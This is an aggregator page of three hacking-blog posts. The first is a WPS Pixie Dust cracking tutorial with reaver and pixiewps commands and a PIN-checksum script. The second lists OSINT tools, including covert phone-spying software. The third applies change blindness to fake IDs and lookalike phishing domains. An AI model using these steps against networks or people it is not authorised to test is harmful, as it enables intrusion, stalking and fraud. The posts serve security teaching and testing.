Social Engineering Blogs

An Aggregator for Blogs About Social Engineering and Related Fields

Subliminal Hacking Blog September 21, 2015

How To Crack WPS with Pixie Dust … Offline Attacking

In this post we are looking at how vulnerable WPS makes your Access Point. WiFi Protected Setup makes it nice and easy for you to connect to your wireless devices by using a simple PIN number instead of your hard-to-guess passphrase. The issue is that this means your secure 32-character passphrase is about as much use as a chocolate fireguard: instead of taking potentially years to crack, you can attack the PIN, which only has 11,000 iterations, and this can be cracked in hours (even with timeouts and other controls in place).
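To show where the 11,000 figure comes from, here is an added worked example in Python (not code from the original post): it implements the WPS PIN checksum rule from the Wi-Fi Simple Configuration spec and counts how many guesses each half of the PIN can take when the registrar confirms the halves separately. The PIN values in it are constructed.

```python
# Added example: why the WPS PIN space is 11,000 guesses rather than 10^8.
# The checksum rule follows the Wi-Fi Simple Configuration spec; the PIN
# values used below are constructed for illustration.

def wps_checksum(pin7: str) -> int:
    """Return the 8th (check) digit for a 7-digit WPS PIN body.

    The spec weights the seven digits 3,1,3,1,3,1,3 (leftmost first) and
    picks the check digit so that the weighted sum plus the check digit
    is a multiple of 10.
    """
    if len(pin7) != 7 or not pin7.isdigit():
        raise ValueError("pin7 must be exactly 7 decimal digits")
    weighted = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(pin7))
    return (10 - weighted % 10) % 10


def is_valid_pin(pin8: str) -> bool:
    """True if an 8-digit PIN satisfies the WPS checksum rule."""
    if len(pin8) != 8 or not pin8.isdigit():
        return False
    return wps_checksum(pin8[:7]) == int(pin8[7])


def candidate_second_halves(first_half: str) -> int:
    """Count the 4-digit second halves that are valid for a fixed first half.

    Only 3 of the last 4 digits are free; the 4th is the checksum, so
    exactly one in ten candidates survives.
    """
    return sum(1 for n in range(10_000) if is_valid_pin(first_half + f"{n:04d}"))


def worst_case_attempts() -> int:
    """Guesses needed when the registrar confirms each half separately.

    The WPS exchange reveals whether the first 4 digits were right before
    the second half is ever checked, so the two halves are searched
    independently instead of as one 7-digit secret.
    """
    first_half_space = 10 ** 4                            # every 4-digit prefix
    second_half_space = candidate_second_halves("0000")   # 3 free digits + checksum
    return first_half_space + second_half_space


if __name__ == "__main__":
    # "12345670" is a constructed PIN that passes the checksum rule.
    print("12345670 valid:", is_valid_pin("12345670"))
    print("valid 7-digit PIN bodies:", 10 ** 7)
    print("worst case when halves are confirmed separately:", worst_case_attempts())
```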

In this video we will show how a vulnerability in some of the chipsets of Wireless Access Points allows you to crack the WPS code in less than a second as well as revealing the WPA pin number. This attack is called the PixieDust attack, and it currently works on certain firmware on Broadcom, Realtek, Ralink and MediaTek chipsets. In the video this is demonstrated on an older BT HomeHub 3 which is using a Realtek chipset.

The way this works is that the Enrollee hashes (E-Hash1 / E-Hash2) are supposed to be secret, but when they are disclosed we can use them, along with the Enrollee and Registrar public keys, the E and R nonces and the Auth Key, to recover the WPS PIN.

Just to provide some comparison: using the WPS PixieDust attack we got the PIN and then the WPA2 passphrase in less than a second. Stealing the WPA2 hash and attacking it directly with a single GPU, the estimated time to crack (based on knowing it is alphanumeric with no special characters) is 853,399 days, 2 hours and 44 minutes, so yeah, WPS adds some weakness to your hardened access point :)

Below are the commands used during the above video; you can easily copy and paste them with your own information.

iwconfig

airmon-ng start wlan1

airmon-ng check kill

airodump-ng wlan1mon --wps

reaver -i wlan1mon -c -b -vv

pixiewps -e -r -s -z -a -n

reaver -i wlan1mon -c -b -vv -K 1

If you are looking to do this on Ubuntu and not Kali, you will need the following packages (cheers Matt):

apt-get install build-essential libnl-3-dev libnl-genl-3-dev

wget http://download.aircrack-ng.org/aircrack-ng.1.2-rc2.tar.gz

git clone https://github.com/t6x/reaver-wps-fork-t6x

git clone https://github.com/wiire/pixiewps

Finally, in the WPS column you need to be checking for one of the following to make sure the Access Point has WPS enabled; if none of them appears, either WPS isn't supported on the device or you have successfully disabled it: 1.0, LAB, PBC, NFC, PIN.

Filed Under: Hacking, Tools

Subliminal Hacking Blog December 27, 2012

OSINT Tools … Recommendations List

Free OSINT Tools.

With the New Year fast approaching I thought now would be a great time to post the first draft of some recommended Open Source Intelligence (OSINT) gathering tools and resources. I will look to maintain this list over time and have it grow, so if you come across something you think should be on the list, drop me an email or leave a comment for consideration.

The reconnaissance phase of any engagement is very important and can often save you a lot of time and, of course, money. If you are really lucky you may even find the information you are looking for freely posted online. Either way, the information you find will only be as good as the tools you use, so with this in mind here is the list, based on tools I have come across over the years or that have been recommended by other InfoSec peeps.

* Please note even though the aim is to provide information for free OSINT Tools, some may require a subscription or commercial fee.

Spokeo – People search engine and free white pages finds phone, address, email, and photos. Find people by name, email, address, and phone for free.
theHarvester – This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.
Foca – FOCA 3.2 Free is a fingerprinting and information gathering tool for pentesters. It searches for servers, domains, URLs and public documents and prints out the discovered information in a network tree. It also searches for data leaks such as metadata, directory listings, insecure HTTP methods, .listing or .DS_Store files, active cache in DNS servers, etc.
Shodan – Search for computers based on software, geography, operating system, IP address and more
Maltego – Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. Maltego’s unique advantage is to demonstrate the complexity and severity of single points of failure as well as trust relationships that exist currently within the scope of your infrastructure.
Deep Magic – Search for DNS records and other fun stuff
Jigsaw – Jigsaw is a prospecting tool used by sales professionals, marketers and recruiters to get fresh and accurate sales leads and business contact information.
Hoovers – Search over 85 million companies within 900 industry segments; Hoover’s Reports are easy-to-read reports on key competitors, financials, and executives.
Market Visual – Search Professionals by Name, Company or Title
FoxOne Scanner – Non-Invasive and Non-Detectable WebServer Reconnaissance Scanner
Creepy – creepy is an application that allows you to gather geolocation related information about users from social networking platforms and image hosting services.
Recorded Future – Recorded Future intelligence analysis tools help analysts understand trends in big data, and foresee what may happen in the future. Groundbreaking algorithms extract temporal and predictive signals from unstructured text. Recorded Future organizes this information, delineates results over interactive timelines, visualizes past trends, and maps future events– all while providing traceability back to sources. From OSINT to classified data, Recorded Future offers innovative, massively scalable solutions.
MobiStealth – Mobistealth Cell Phone Spy Software empowers you to get the answers you truly want and deserve. Including a host of advanced surveillance features, our Cell Phone Spy Software secretly monitors all cell phone activities and sends the information back to your Mobistealth user account.
Snoopy – Snoopy is a distributed tracking and profiling framework
Stalker – STALKER is a tool to reconstruct all captured traffic (wired or wireless alike) and parse out all of the “interesting” information disclosures.  It goes beyond just grabbing passwords and emails out of the air as it attempts to build a complete profile of your target(s).  You would be amazed at how much data you can collect in 15 minutes.
LinkedIn Maps – Your professional world. Visualized. Map your professional network to understand the relationships between you and your connections
LittleSis – LittleSis is a free database of who-knows-who at the heights of business and government.
Entity Cube – EntityCube is a research prototype for exploring object-level search technologies, which automatically summarizes the Web for entities (such as people, locations and organizations) with a modest web presence.
TinEye – TinEye is a reverse image search engine built by Idée currently in beta. Give it an image and it will tell you where the image appears on the web.
Google Hacking DB – Google Search Query Fu to find the secret sauce
ServerSniff – ServerSniff.net – Your free “Swiss Army Knife” for networking, server checks and routing, with many little toys and tools for administrators, webmasters, developers, power users and security-aware users.
MyIPNeighbours – My IP Neighbors lets you find out if any other web sites (“virtual hosts”) are hosted on a given web server.
Social Mention – Social Mention is a social media search engine that searches user-generated content such as blogs, comments, bookmarks, events, news, videos, and more
Glass Door – Search jobs then look inside. Company salaries, reviews, interview questions, and more – all posted anonymously by employees and job seekers.
NameCHK – Check to see if your desired username or vanity url is still available at dozens of popular Social Networking and Social Bookmarking websites.
Scythe – The ability to test a range of email addresses (or account names) across a range of websites (e.g. social media, blogging platforms, etc…) to find where those “targets” have active accounts.
Recon-NG – A nice Python Script that automates recon on LinkedIn, Jigsaw, Shodan and some search engine fu.
Pushpin – Awesome little Python script that will identify every tweet, Flickr pic and YouTube video within an area around a specific geo address.
Silobreaker – Enterprise Semantic Search Engine, allows virtualisation of data, analytics and exploration of key data.
Google Trends – See what are the popular related topics people are searching for. This will help widen your search scope.
Google Alerts – Google Alerts are email updates of the latest relevant Google results (web, news, etc.) based on your queries.
Addict-o-matic – Nice little search aggregator. Allows you to enter a search term and build a page from search and social networking sites.
PasteLert – PasteLert is a simple system to search pastebin.com and set up alerts (like Google Alerts) for pastebin.com entries. This means you will automatically receive email whenever your term(s) is/are found in new pastebin entries!
Kurrently – Real Time Search Engine for Social Media.
CheckUsernames – Check for usernames across 160 Social Networking Sites.
Whos Talkin – Social media search tool that allows users to search for conversations surrounding the topics they care about most.
192 – Search for People, Businesses and Places in the UK.
Esearchy – Esearchy is a small library capable of searching the internet for email addresses. It can also search for emails within supported documents.
TouchGraph SEO – Java based tool for importing and visualising various data types.

It's not listed above, but of course popular social networks such as Facebook, Twitter, LinkedIn and the like have a wealth of information. Also consider older sources that are now less popular; it's amazing what people leave behind on stuff like MySpace. And remember that search engines show you stuff that's popular, not necessarily the obscure stuff you are searching for, so get creative with your search queries and use the various tools at your disposal.

Lastly, I will add that a lot of social engineers don't have a lot of global exposure, so do your homework on where you are targeting. If you are targeting Japan, for example, their number 1 social network is not Facebook, so you need to do recon in the right places and put in the extra legwork to gain the relevant access.

Filed Under: Hacking, infosec

Subliminal Hacking Blog November 16, 2012

Now you see it, now you don't … Change Blindness

Change blindness is an interesting natural phenomenon every human experiences on a pretty regular basis, but what is it exactly? Essentially it's our inability to spot obvious changes that occur around us. There has been a fair bit of study done to understand this better, and while I won't claim to have all the answers, I do know that this research has shown that, surprisingly, we are not so good at spotting changes in colour, but are better at spotting when something is added to or removed from a scene. I imagine carrying out these studies is pretty difficult, as by their nature the participants know they are being tested and are under controlled conditions, which is interesting because change blindness is most common when we are not looking for changes, when our mind isn't focused and attentive to the finer details. This is an interesting area of study and one that I believe will continue for a while, as there can be legal complications when it comes to testimonies where images are concerned. I personally think some of this comes back to what we have discussed before: the human mind is processing so much information so quickly that it wants to help out and settle on an easy answer, so it doesn't pay attention to what it may consider minor details at that moment. If you find this sort of thing interesting, I recommend doing some further research on change blindness and what your mind really knows about what is occurring at this instant.

So why is change blindness of any interest to you from a social engineering perspective? Well, I feel there are a few reasons. The first one, and the one most difficult to get your head around, is that attention to detail really isn't that important sometimes. What do I mean? Well, Harvard did some interesting research (Derren Brown example below) called “The Person Swap”, where they had people approach a desk where a gentleman would have them sign a form; he would then duck down to file the form and another man would pop up, and a large percentage didn't notice any change. When you think of a change this significant it puts a few things in perspective: the key thing here is that people were not looking for or expecting change. So if you are prepping for an onsite engagement, ask yourself: will my ID need to stand up to direct scrutiny, or will just having something similar do the job?

The same applies to things such as phishing campaigns. It may seem obvious, as many people already know that when we read something the letters of a word can be jumbled and it still makes sense to us. The same applies to domain names and other key pieces of information, so perhaps substitution isn't always required; simply omitting something could still be successful, as nobody would expect it not to be right.

This is just a brief glimpse at what change blindness means to us; in reality it should tell us that a lot of what we do or don't see is an illusion. If you think it wouldn't happen to you, or that you would have spotted it, think again. Sure, you will spot the issues where you are suspicious and are looking, but that's not something many of us do for everything, unless we are very paranoid. Then we imagine things that are not there at all :D

Another good change blindness test :)

Filed Under: Influence, Misdirection, Social Engineering

© Copyright 2025 Social Engineering Blogs · All Rights Reserved ·